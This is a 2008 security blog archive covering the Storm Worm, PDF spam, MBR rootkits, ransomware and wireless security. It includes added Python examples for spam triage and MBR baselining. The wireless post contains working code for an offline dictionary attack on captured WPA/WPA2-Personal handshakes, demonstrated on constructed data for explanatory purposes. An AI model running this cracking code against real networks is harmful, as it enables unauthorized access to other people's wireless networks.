MX Logic IT Security Blog

31 January 2008

Storm Worm Authors Identified? To Be Arrested?

According to this article at internetnews.com, American and Russian law enforcement agencies know who is behind the creation of the Storm Worm.

The article goes into detail on the difficulties of extradition to the United States if American officials request it so I won't belabor that point here.

What matters more is whether this could mean the end of the Storm Worm. Unfortunately not. We already know from Joe Stewart's research that recent Storm variants encrypt their P2P traffic with a key, which in effect partitions the botnet into segments whose nodes can only talk to peers holding the same key. Those segments could be sold off and used for whatever the buyer wants: more spam, different malware, and so on. If the Storm code itself is also passed on, nothing stops Storm from living on.

More worrying is the pattern we keep seeing in malware evolution: each generation builds on the last and gets nastier. So even if no new Storm variants appear once the authors are arrested, the concepts and the code will live on and resurface in the next popular malware strains.

Posted by smasiello at 4:28 PM | Link | 0 comments

Another Day....Another Data Breach

Hardly a day goes by anymore without some sort of breach of confidential data. Whether it is the exposure of almost 40,000 Social Security Numbers of Georgetown University alumni, faculty and staff, the theft of 35,000 records of current and former T. Rowe Price customers, or the well-documented theft of over 45 million credit and debit card numbers from TJX, data theft is rampant and we still haven't learned our lesson.

No matter how much security awareness training you do, and even if 99.99% of your company follows best practices, it only takes one person making one mistake to cause a breach. Some breaches are the result of large-scale infrastructure weaknesses, but a large number come down to one person's lapse. One person who left a PC unlocked or failed to encrypt a hard drive holding sensitive data can cause the loss of millions of records, and with them untold numbers of identity thefts.

We've said this before, but I absolutely believe it to be 100% true: protect your personal information and monitor your bank accounts and credit cards as if the data has already been compromised (because it likely has; the real question is whether someone is going to use yours). As with many things in life, early detection gives you the best chance of recovery. You may not be able to prevent damage to your credit or reputation, but there is a lot you can do to mitigate it once it happens.

Posted by smasiello at 10:59 AM | Link | 0 comments
30 January 2008

Storm Worm Gets Personal

I have to admit that as much as I am tired of talking about the Storm Worm, it keeps giving such great fodder for discussion. Over the past year we have seen fake video clips for current events and e-cards. Now Storm has expanded its horizons and has started sending out one-liner spam with the prospect of a better life between the sheets.

Some of the sample subject lines that we have seen from this new Storm variant include:

-- why you're so unhappy with your bedroom life?

-- Ladies and Gents want to have perfect nights!

-- Become a super-lover-2008!

-- What you will learn from us will change your sensual life for better!

All of the samples we have received are one-liners: the message body is sometimes identical to the subject line (often it is not), followed by a URL pointing to a bare IP address rather than a host name, like hxxp://61,79,172,152/rqokyj/ (modified so you can't actually click the link).

As if we don't see enough health related spam already, now Storm has jumped on the bandwagon as well. I guess if it works for the spammers...

Posted by smasiello at 1:16 PM | Link | 0 comments
24 January 2008

PDF Spam Strikes Back

Today we have been seeing a small wave of PDF spam rearing its head again. If you recall, PDF spam was an extremely popular tactic for spammers back in June and July, 2007. On some of the most prevalent days PDF spam made up over 10% of overall internet spam volume.

Today's wave is relatively small (less than 0.5% of spam volume) compared with the penetration we saw in mid-2007, but PDF spam has been almost completely absent since it waned in late August.

Below is some information related to this latest threat:

-- Subject lines look like poorly translated pill/enhancement advertisements. Some example subjects include "Just out pills, read an email" and "Never-seen pills, overwhelmingly important statement"

-- Message bodies are short pill-based advertisements (the original PDF spam had empty message bodies). Most are similar to this example:

Hello,

Very Inexpensive Ph0ramcy for low price. pay attention to the attachment PDF file.

See you!

-- Attachment names also follow this same theme. Attachment names like pill.pdf, pills.pdf, medicine.pdf, and drug.pdf have been seen by our systems.

The actual PDF attachment is a one-page, text-based PDF. The first three lines contain an additional advertisement such as

Best Offer of Pharmacy Products here: We are waiting for you here: http://PowerMadXmas.com Low Prices, Fast Delivery, and Discreet Package.

(URL above is random)

The next three-quarters of the page contains random word salad unrelated to the actual pill spam. The bottom of the PDF contains text similar to what was found in the message body.

Whether this is a small blip on the radar or spammers looking to get back into PDF spam on a wide scale (not likely) remains to be seen, but with PDF spam volumes near zero for the past five months, this is certainly an interesting development in a tactic that had gone completely dormant.

*** UPDATE 1 1/24/2008 4:20pm MST ***

We have some more PDF spam subject lines:

-- Best offer of pharmacy products

-- Enjoy the newest medication

-- Get the freshest drugs

-- Enjoy the newest remedies

-- Weighty pharmacy offer

-- Major importance medications offer

These are only some of what we have seen, but the prevailing theme remains constant; more pill and drug spam.
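Both the Storm one-liner wave and this PDF wave are easy to pick out of a mail stream once the indicators are written down: a one-line body whose only URL points at a bare IPv4 address, or a short pill-themed body carrying a PDF attachment with a pill-themed file name. The triage below is an added example written for this post, not MX Logic filtering code. The three sample messages are constructed (the IPs are RFC 5737 documentation addresses and the "PDF" is a placeholder byte string), and the keyword list and thresholds are illustrative assumptions, not production rules.

```python
"""Heuristic triage for the two spam waves described above (added example).

Indicators checked:
  * a one-line body whose URL host is a literal IPv4 address (Storm one-liners);
  * a short pharmaceutical-themed message carrying a PDF attachment, and/or a
    pill-themed attachment name (PDF spam wave).
The sample messages below are constructed for this example.
"""
import email
import ipaddress
import re
from email import policy
from email.message import EmailMessage

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
# Illustrative keyword list; "ph[ao]r" catches pharmacy/pharmacy-like misspellings.
PHARMA_RE = re.compile(r"\b(pills?|ph[ao]r\w*|drugs?|medic\w*|remed\w*)\b", re.IGNORECASE)
# Spammers swap letters for digits ("Ph0ramcy"); fold the common ones back first.
LEET = str.maketrans("0134", "oiea")


def bare_ip_hosts(text: str) -> list:
    """Return URL hosts in `text` that are literal IPv4 addresses (port stripped)."""
    hosts = []
    for host in URL_RE.findall(text):
        host = host.split(":")[0]
        try:
            ipaddress.IPv4Address(host)
        except ValueError:
            continue
        hosts.append(host)
    return hosts


def pharma_terms(text: str) -> list:
    """Pill/pharmacy words found in `text` after undoing simple leet-speak."""
    return sorted({m.lower() for m in PHARMA_RE.findall(text.translate(LEET))})


def triage(raw: str) -> dict:
    """Parse one RFC 822 message and report which spam indicators fire."""
    msg = email.message_from_string(raw, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    lines = [ln for ln in body.splitlines() if ln.strip()]
    subject = str(msg.get("Subject", ""))

    pdf_names = [
        (part.get_filename() or "").lower()
        for part in msg.iter_attachments()
        if part.get_content_type() == "application/pdf"
        or (part.get_filename() or "").lower().endswith(".pdf")
    ]
    ips = bare_ip_hosts(body)
    reasons = []
    if len(lines) <= 1 and ips:
        reasons.append("one-liner body with bare-IP URL")
    if pdf_names and len(lines) <= 5 and (pharma_terms(subject) or pharma_terms(body)):
        reasons.append("short pharma-themed body with PDF attachment")
    if pdf_names and any(pharma_terms(name) for name in pdf_names):
        reasons.append("pill-themed PDF attachment name")
    return {
        "subject": subject,
        "body_lines": len(lines),
        "bare_ip_hosts": ips,
        "pdf_attachments": pdf_names,
        "reasons": reasons,
        "spam": bool(reasons),
    }


# --- constructed samples ---------------------------------------------------
STORM_ONE_LINER = (
    "From: sender@example.net\nTo: user@example.com\n"
    "Subject: Become a super-lover-2008!\n\n"
    "Become a super-lover-2008! http://198.51.100.7/rqokyj/\n"
)

LEGIT = (
    "From: colleague@example.com\nTo: user@example.com\nSubject: Meeting notes\n\n"
    "Hi,\n\nNotes from today are on the wiki: http://wiki.example.com/notes\n\nThanks\n"
)


def build_pdf_spam_sample() -> str:
    """Constructed MIME message shaped like the PDF wave; the attachment is not a real PDF."""
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Just out pills, read an email"
    msg.set_content("Hello,\n\nVery Inexpensive Ph0ramcy for low price. "
                    "pay attention to the attachment PDF file.\n\nSee you!\n")
    msg.add_attachment(b"%PDF-1.4\n% constructed placeholder\n",
                       maintype="application", subtype="pdf", filename="pills.pdf")
    return msg.as_string()


if __name__ == "__main__":
    for raw in (STORM_ONE_LINER, build_pdf_spam_sample(), LEGIT):
        print(triage(raw))
```

Only the message envelope is inspected here; the word-salad and URL inside the PDF itself would need a PDF text extractor, which this example deliberately leaves out.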

Posted by smasiello at 4:23 PM | Link | 0 comments
17 January 2008

New Rootkits Going Old School

Just as we have reported a large movement back towards old-school spam tactics like text obfuscation (in lieu of PDF- and image-based spam), malware seems to be doing the same and is going after the Master Boot Record.

Master Boot Record (MBR) malware runs when the BIOS loads the first sector of the boot disk and executes the boot code it finds there, and (here comes the key part) that happens BEFORE the operating system loads.

So, why is this important?

Most Windows malware with a rootkit component installs itself as, or hooks into, a kernel-mode device driver. That means the rootkit runs after the operating system loads (or while it is loading, depending on the driver). A rootkit that replaces the MBR boot code runs before the operating system loads, so it can patch the OS loader and kernel as they come up. That makes it both stealthier and harder to detect, and also much harder to remove. Reformatting a partition and reinstalling the operating system does not touch the MBR, so the rootkit survives even after the malware that installed it is gone. Getting rid of it means rewriting the MBR explicitly (the Windows XP Recovery Console's fixmbr does this) or, better, comparing the boot code against a known-good copy so you know it is there in the first place.

We have crossed the threshold into the next wave of malware, as cyber criminals continue to make malware and rootkits less detectable and more difficult to remediate.
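The check a practitioner wants here is simple: the MBR is one 512-byte sector with a fixed layout (boot code, a 4-byte disk signature, a 4-entry partition table and the 0x55AA signature), so the boot-code region can be hashed and compared against a baseline taken when the machine was known clean. The parser below is an added example written for this post, not MX Logic or any vendor's tool. The sample MBR is constructed: a few bytes of typical boot-code prologue padded with zeros, plus one bootable NTFS partition. Reading a real disk's first sector (for example from \\.\PhysicalDrive0 on Windows or /dev/sda on Linux) requires administrator rights and is left to the caller.

```python
"""Parse and baseline a 512-byte Master Boot Record (added example).

Layout (classic MBR): bytes 0-439 boot code, 440-443 disk signature,
444-445 reserved, 446-509 four 16-byte partition entries, 510-511 0x55AA.
An MBR rootkit replaces the boot-code region, so that is what gets hashed;
the partition table is decoded too so a moved partition or changed
bootable flag is visible.  Sample data below is constructed.
"""
import hashlib
import struct

MBR_SIZE = 512
BOOT_CODE_LEN = 440
DISK_SIG_OFF = 440
PART_TABLE_OFF = 446
PART_ENTRY_LEN = 16
BOOT_SIGNATURE = b"\x55\xaa"


def parse_mbr(mbr: bytes) -> dict:
    """Decode an MBR sector into a boot-code hash, disk signature and partition list."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("MBR must be exactly 512 bytes")
    if mbr[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = PART_TABLE_OFF + i * PART_ENTRY_LEN
        # status(1) CHS-start(3) type(1) CHS-end(3) LBA-start(4) sector-count(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", mbr, off)
        if ptype == 0:
            continue  # unused entry
        partitions.append({
            "index": i,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", mbr, DISK_SIG_OFF)[0],
        "partitions": partitions,
    }


def check_boot_code(mbr: bytes, baseline_sha256: str) -> bool:
    """True when the boot-code region still matches the baseline recorded on a clean system."""
    return parse_mbr(mbr)["boot_code_sha256"] == baseline_sha256


# Constructed boot-code prologue (cli; xor ax,ax; mov ss,ax; mov sp,0x7c00), zero padded.
CLEAN_BOOT_CODE = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c"


def make_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed MBR: the given boot code, one bootable NTFS partition starting at LBA 63."""
    code = boot_code.ljust(BOOT_CODE_LEN, b"\x00")[:BOOT_CODE_LEN]
    disk_sig = struct.pack("<I", 0xDEADBEEF) + b"\x00\x00"
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 63, 20971457)
    table = entry + b"\x00" * (PART_ENTRY_LEN * 3)
    return code + disk_sig + table + BOOT_SIGNATURE


if __name__ == "__main__":
    clean = make_sample_mbr(CLEAN_BOOT_CODE)
    baseline = parse_mbr(clean)["boot_code_sha256"]
    # Simulate a rootkit that patches a jump over the original code (constructed).
    infected = make_sample_mbr(b"\xeb\x3c" + CLEAN_BOOT_CODE[2:])
    print("clean matches baseline:", check_boot_code(clean, baseline))
    print("infected matches baseline:", check_boot_code(infected, baseline))
    print(parse_mbr(infected)["partitions"])
```

Note that the partition table of the infected sample is unchanged; that is exactly why a scan that only looks at partitions, or an OS-level file-system check, misses this class of rootkit.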

Posted by smasiello at 9:51 AM | Link | 0 comments
10 January 2008

Happy Birthday SoBig!

January 9, 2008 marks the fifth anniversary of the SoBig.A virus. The variant that really brought SoBig its fame and notoriety was SoBig.F, which didn't appear until later that year (August 2003). SoBig as a family, however, marked a monumental shift in the malware paradigm: from clout and recognition in the cyber criminal community to an economy driven by making money.

It is this paradigm shift that has continued to evolve over the past five years. In that time we have gone from phishing messages with bad grammar and easily blocked delivery methods to finely crafted social engineering and a full underground economy in which phishing and malware kits are sold as a business, complete with technical support and free upgrades, a model much like the one offered by many legitimate software companies.

It was a logical transition for the ecosystem to make, moving from the for-recognition model of spam and malware attacks to the for-profit model, but it was SoBig that really jump-started the movement. So when you see your next PayPal phish or drive-by download, be sure to tip your glass to SoBig, the grandfather of it all.

Posted by smasiello at 10:47 AM | Link | 0 comments
07 January 2008

When is Spam Really Going Away?

Bill Gates has predicted the demise of spam (in January 2004 he gave it two years). Many others have developed feature-rich and not-so-feature-rich applications to defeat spam on a variety of platforms.

A question I am asked by a lot of people when they find out not only who I work for but what my role is with the company is "Will the spam war ever be won?" That's always a difficult question to answer because the definition of spam keeps changing, which means the rules of engagement and the war itself keep changing too. For example, the classic definition of spam that most people think of when they hear the word is the kind that appears in your email inbox. Over the past couple of years, as more internet technologies have come into wide-scale use, we have been graced with other spam-related acronyms and terms: SPIM (spam over instant messaging), SPIT (spam over internet telephony), vishing, smishing, and most recently bacn. One of the Storm Worm variants even dabbled in popup spam, where infected machines displayed a stock pump-and-dump scam in a web browser popup window.

I would say that certain parts of the spam war are being fought better than others (the fight for the inbox, for instance), but in other areas the abuse is so new, and the countermeasures so nascent, that they aren't all that effective yet. They will certainly improve, but as the technology to fight the problem evolves, so do the ways in which the underlying technologies are abused.

The words "personal computer" and "inbox" become more ambiguous every day with the advance of smart phones, PDAs and other communication devices. There is very little from a business productivity perspective that you cannot do on a mobile device anymore, so more and more people use their phones and PDAs just as they would a laptop or desktop PC. That creates additional avenues for abuse. Spammers have been and will continue to look for new and inventive ways to latch onto any emerging technology, whether SMS, network and browser popups, voicemail injection, instant messaging, or whatever real-time communication technology comes next. With those changes, the fight against spam continues and evolves as well.

Posted by smasiello at 4:19 PM | Link | 0 comments
04 January 2008

Alan Ralsky Indicted on Spam Charges

Spammer Alan Ralsky, arrested back in April, has been indicted along with 10 accomplices for the spam ring that he was running which made money using stock pump and dump scams on lightly traded Chinese penny stocks.

I certainly applaud the fact that he is starting to move through the judicial system, and my hope is that he and his gang are put away for a very long time. From an industry perspective, though, my position is and always has been that arresting individual spammers doesn't make any tangible difference. Our mail servers won't be processing any less spam because Ralsky, Soloway or any other "Spam King" is off the streets. There are always more spammers-to-be waiting in the wings behind them.

So as unfortunate as it is, don't expect to see any difference in the amount of spam ending up in your spam folders.

Posted by smasiello at 10:56 AM | Link | 0 comments
03 January 2008

Have No Fear! Wireless is Secure!

....or so networking equipment vendor 3Com would have you believe.

Today's blog entry is based on an article posted by The Star Online which states (comparing the risks of wired and wireless networks) that "the risks are the same as those posed to wired networks - the typical computer virus infection and odd worm-intrusion incident". Last I checked, worms and viruses, although significant risks in and of themselves, are far from the only risks facing wireless and wired networks. What about the attacker next door who sets up a wireless sniffer to try to crack the encryption key used on your wireless network? Or the one who is just casually looking for completely open wireless networks to attach to?

The article also states: "What's even more interesting is that some of these organisations did not face any security threats and have found that the security of their networks either improved or remained unchanged when they moved to wireless." This has nothing to do with the deployment of wireless. There are three main link-layer protection schemes used on wireless networks today: WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access) and WPA2, and each of WPA and WPA2 comes in a Personal mode (one shared passphrase for the network) and an Enterprise mode (per-user 802.1X authentication). Nowhere in any of these names is the word "security" used. Why? Because they do not provide "security". They provide encryption and some level of access control, and how much that is worth varies a great deal: WEP's key can be recovered in minutes from captured traffic, WPA/WPA2-Personal is only as strong as its passphrase because a single captured handshake allows an offline dictionary attack, and WPA2-Enterprise removes the shared secret but still only protects the radio hop. In this instance, as part of the wireless deployment the organisation may have added safeguards such as requiring VPN authentication after the wireless association succeeds, but that is an architectural change, not a property of the wireless network itself.

The article also mentions that consumer-grade wireless networking equipment is less secure than enterprise-grade equipment. As far as encryption goes, that is not true: consumer and enterprise access points generally support the same WEP, WPA and WPA2 protocols. Where enterprise gear does differ is in what sits around the radio (802.1X/RADIUS integration, central management, rogue access point detection), and that again is architecture rather than stronger encryption. The weak link is usually the equipment connecting to the access point, predominantly laptops, not all of which support the newer protocols. This is especially true in organizations that deploy older, bargain-basement laptops whose internal wireless adapters may support nothing beyond basic WEP. That is not a shortcoming of the access point's security; it is a limitation of the machines connecting to the network. The access point is not less secure because it is a D-Link you bought for $75 at a local retailer rather than a Cisco that may have cost several hundred.
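To make "encryption that can be cracked" concrete for the most common case, WPA/WPA2-Personal: the 256-bit pairwise master key is nothing more than PBKDF2-HMAC-SHA1 over the passphrase and SSID, and the 4-way handshake lets anyone who sniffed it check passphrase guesses offline against the frame's MIC, with no further contact with the network. The code below is an added example written for this post, not MX Logic or any vendor's code. The "captured" handshake is constructed locally from a deliberately weak passphrase so the attack can run offline; the MAC addresses, nonces, SSID and wordlist are made up, and the EAPOL-Key frame is a minimal one with no key data. The PBKDF2 step is checked against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""WPA/WPA2-Personal PSK derivation and offline dictionary attack (added example).

PMK  = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
PTK  = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))
KCK  = PTK[0:16]
MIC  = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[0:16]   (WPA2/CCMP)
Handshake data below is constructed, not captured from a real network.
"""
import hashlib
import hmac
from typing import Optional

MIC_OFFSET = 81  # MIC field offset inside an EAPOL-Key frame (4-byte header + 77 bytes)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i passphrase-to-PSK mapping."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF built from HMAC-SHA1; 48 bytes suffice for a CCMP PTK."""
    out = b""
    counter = 0
    while len(out) < 48:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:48]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: the first 16 bytes of the pairwise transient key."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_384(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 MIC over the EAPOL-Key frame with its MIC field zeroed (WPA/TKIP would use HMAC-MD5)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(handshake: dict, wordlist) -> Optional[str]:
    """Return the first passphrase whose KCK reproduces the captured MIC, else None."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, handshake["ssid"])
        kck = derive_kck(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return guess
    return None


def make_constructed_handshake(ssid: str, passphrase: str) -> dict:
    """Fabricate what a sniffer would record from handshake message 2 (all values constructed)."""
    ap_mac = bytes.fromhex("00112233aabb")
    sta_mac = bytes.fromhex("00aabbccdd01")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    # Key descriptor: type(1) key-info(2) key-len(2) replay(8) nonce(32) IV(16) RSC(8) ID(8)
    descriptor = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8 + snonce
                  + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)
    body = descriptor + b"\x00" * 16 + b"\x00\x00"          # zeroed MIC + key-data length 0
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": frame, "mic": mic}


if __name__ == "__main__":
    captured = make_constructed_handshake("CoffeeShop", "sunshine1")
    print(crack_psk(captured, ["123456", "letmein", "sunshine1", "qwerty"]))
```

The 4096-round PBKDF2 is the only thing slowing the attacker down, and it is bound to the SSID, so a common SSID with a dictionary-word passphrase is the worst case; WPA2-Enterprise avoids the problem entirely by having no network-wide passphrase to guess.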

Why am I being so hard on this article? Mainly because I keep hearing people draw a connection between wireless networks and security, and in this case between wireless deployment and _increased_ security! As I mentioned earlier, there are certainly best practices you can adopt as an organization if you are going wireless, but again these are not security functions of the wireless network or the equipment itself. They are functions of your own architecture and safeguards, put in place to limit what a criminal can reach even if they do manage to get onto your wireless network.

Wireless is a wonderful technology and I am a big proponent of it (I use it all day between work and home), but wireless does not equal security. Please don't confuse the two!

Posted by smasiello at 1:41 PM | Link | 0 comments
02 January 2008

New Ransomware Trojan Makes the Rounds

It's been a while since we have seen a good Ransomware trojan. It is too bad for the criminals who wrote this new trojan that they can't spell.

Back in March 2006 a trojan named Cryzip was discovered. If your PC got infected with it, it would look for files with certain extensions (.doc, .xls and .zip, to name a few) on your C drive, encrypt them, and leave a text file behind describing how you could get your files back if you paid a $300 "ransom" to an e-gold (anonymous online money transfer service) account.

This new trojan works a bit differently. It effectively locks up your PC and demands that you pay $35 (apparently ransoms don't fetch what they used to) to get control back. The cyber criminals probably figured that $35 was low enough that people would find it easier to pay than to fight.

The infected machine also displays an error message window titled "ERROR: Browser Security and Antiadware [sic] Software component license exprited [sic]". Funny, I didn't know my browser security could exprite! The window also tells you that surfing porn and adult sites without security software is "dangerows". Oh no! I don't know what "dangerows" is, but I am pretty certain I don't want any of it!

If you click to activate a new license in the error window, you are presented with a second window showing a 1-900 number and a PIN to enter when you call (the cost of the call is $35).

Cryzip's biggest weakness was that it used a single low-grade encryption key, which security researchers recovered and posted online, rendering the trojan and its extortion technique useless. Maybe someone will pay the $35 to unlock their PC infected with this new trojan and post the cleaning instructions online? :)

Posted by smasiello at 6:09 PM | Link | 0 comments

Malware Growth by Year

The folks over at F-Secure posted an image charting malware growth by year since 1986 (the year of the first PC virus, Brain.A). The scale of the graph is somewhat skewed by the enormous growth of the past few years, but the numbers jibe with what McAfee AVERT Labs recently reported: more malware (new strains and variants of existing malware) was discovered in 2007 than in 2005 and 2006 combined.

2008 is expected to provide no relief to this trend either. Hang on and please keep your hands and feet inside the ride at all times!

Posted by smasiello at 3:56 PM | Link | 0 comments
© MX Logic, Inc.